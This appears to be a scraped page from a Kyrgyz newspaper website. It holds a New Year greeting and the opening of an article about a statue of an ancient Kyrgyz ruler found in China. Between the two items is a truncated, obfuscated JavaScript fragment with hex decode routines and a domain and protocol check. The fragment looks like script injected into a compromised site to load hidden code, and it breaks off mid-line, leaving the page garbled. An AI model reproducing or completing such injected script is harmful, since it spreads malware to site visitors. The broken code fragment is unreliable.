Dec 27

Мечин жылы – мээримдүүлүктүн жылы болсун!

Асылдыкты тутунган ардактуу ак калпак кыргыз эли, урматтуу окурмандар!

novogodnye_oboi_dlya_rabochego_stola_2016-3

Кадырлашуу – касиеттүүнүн, сыйлашуу – сыймыктуунун иши. Келечегибизге карай түздөнүп, кезибизди туура жашап өтүү учурдун талабы азыр.

Жаңырып келген Мечин жылыбыз мээримдүүлүктүн жана жандуулуктун жылы болсун!

Жашоонун негизин тааныган, өзөгүн өстүргөн, аң-сезими бийик адамдардын катары артсын. Иш баштасак ак, аткарылышы так, байышы изги болсун. Пейилибиз кең, кең пейилдүүлөр тең болсун. Тутунганыбыз туруктуулук, тумарыбыз эл-журтубуз болсун. Саныбыз сак, жаныбыз соо болсун. Жакшылыктын илеби, жаратмандыктын толкуну жүрсүн. Жерибиз нурга бөлөнүп, элибиз мээримге балкысын!

Оюбуз ойгоо болсун. Көрүүбүз кенен, акылыбыз терең, билгенибиз бийик болсун. Коомубуз нарктуу, жолубуз көрктүү, көкүрөктөр демдүү, жалгыздар элдүү, жашообуз шаңдуу, кампабыз дандуу болсун. Татканыбыз таза, ичкенибиз тунук болсун!

Ааламыбыздын шайкештиги сакталып, ар бирибизде ырааттуулук, иреттүүлүк өкүм сүрсүн. Аруулук орногон элибиздин ажары ачылып, жылдызы жансын! Улуктарга жол болсун! Өнөрлүүлөр өсүп, эл-жерибиздин даңкын чыгарсын, жердештерибиздин жеңиши көп болуп, элибиз жүзү жаркып, ар-намысы артсын. Очогубуздун оту өчпөй, түндүгүбүздөн жарык нур жаап, кут куюлуп турсун. Кел-келибиз келгенде күтүнөөр элибиз камдуу болсун. Жүрөгүбүзгө орногон сүйүү -күйүмдүүлүк, камкордук, жоопкерчилик жана чындык аркылуу чагылып чыгып, мамилелерди жылытсын!

Дүйнөдө тынчтык болсун! Жаратканыбыз ырысы менен берекесин мол берсин, карманаар деңгээлди кошо берсин. Жан дүйнөбүз байып, изденүүбүз бийиктеп, кубанычыбыз зор болсун! Жаңы жылыбыз куттуу болсун!

Сиздерди терең урматтап, “Көк асаба” гезитинин жамааты!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Dec 27

Кытайдан табылган кыргыз ажосунун айкели

Рисунок1

Макелек Өмүрбай кыргыз ажосунун айкелинин жанында

Кытай Эл Республикасынын жараны, «Тил жана Котормо» журналынын башкы редактору, филология илимдеринин доктору, окумуштуу КАРМЫШТЕГИН МАКЕЛЕК ӨМҮРБАЙ уулу көптөгөн эмгектери менен бирге кыргыздын тарыхын, байыркы кыргыз бийлигин, кыргыз мамлекеттүүлүгүн тынбай изилдеп келет.

Кытай жазмаларынын ишенимдүү булактарына таянуу менен, Кыргыз кагандарынын ысымдарын жана алар тууралуу маалыматтарды Макелек Өмүрбай мындан бир жылдай мурун жазып чыгып, башка гезит беттерине жарыялаган. Кагандар боюнча толуктоо маалыматтары азыркы макаланын этегинде берилип, ал эми өзөгүндө окумуштуунун кыргыздын VIII кылымдагы ажосу Жетисан Бекбай Багачордун Кытайдын Шаншы (Шаньси) провинциясынан табылган айкели, ал тууралуу маалымат жана андагы 61 айкел тууралуу изилдеп-иликтеген ойлору камтылды.

Макаланын сѳз курамынын жазылышын автор ѳзү кандай жазса, ошол бойдон бузбай берүүгѳ аракет кылдык. Кайнарбек Бийлибаев Continue reading